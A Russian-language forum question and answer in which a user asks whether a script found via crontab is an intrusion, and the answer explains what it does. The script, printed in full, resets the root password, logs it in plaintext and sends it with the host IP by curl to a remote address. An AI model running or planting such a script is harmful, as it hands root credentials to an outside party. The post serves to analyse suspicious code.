Я нашел эту запись в своей crontab:

 #@reboot /usr/local/bin/email_passwordscript.sh
  

Хотя он закомментирован, меня это беспокоило, поэтому я искал этот скрипт в /usr/local/bin . Я нашел следующий скрипт в своей папке, но, что интересно, с другим именем (set_password.sh ):

 #!/bin/sh

PASSWORD=$1

if [ "$#" -eq 0 ]; then
    IPS=$(hostname -I)
    PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
    IPS=$(echo $IPS | sed 's/ / /g')
    OLD_PASSWORD=1
fi

echo "PASSWORD IS $PASSWORD" >> /var/log/new_passwordscript.log
echo "root:$PASSWORD" | chpasswd

hostname_str=`hostname`
sed -i "s/%HOSTNAME%/$hostname_str/" /etc/zabbix/zabbix_agentd.conf

if [ $OLD_PASSWORD == 1 ]; then
    curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPSamp;password=$PASSWORD" >> /var/lo
g/passwordscript.log
fi
  

Это попытка взломать мою машину? Если да, может ли кто-нибудь подсказать, как это произошло? Похоже, что это кто-то в моей локальной сети, но этот IP-адрес не дает никаких подсказок, т.Е. Ответа нет.

Этот код кажется опасным.

Код изменяет пароль root компьютера и отправляет IP-адрес компьютера вместе с его паролем на удаленный компьютер.

Как это работает:

 PASSWORD=$1 
  

Присваивает первый аргумент в вызове password

 if [ "$#" -eq 0 ]; 
    IPS=$(hostname -I)
    PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
    IPS=$(echo $IPS | sed 's/ / /g')
    OLD_PASSWORD=1
fi
  

Проверяет, есть ли аргумент, например./email_passwordscript.sh ХХХ. Если его нет, он сгенерирует случайный пароль.

  echo "root:$PASSWORD" | chpasswd
  

Эта строка изменяет пароль

 curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPSamp;password=$PASSWORD"
  

Отправляет пароль на удаленный сервер.

Как это произошло?

На этот вопрос сложно ответить, поскольку существует множество способов, которыми этот скрипт мог попасть на ваш компьютер, например:

• Кто-то, имеющий физический доступ к вашему компьютеру
• Непреднамеренная установка вредоносного программного обеспечения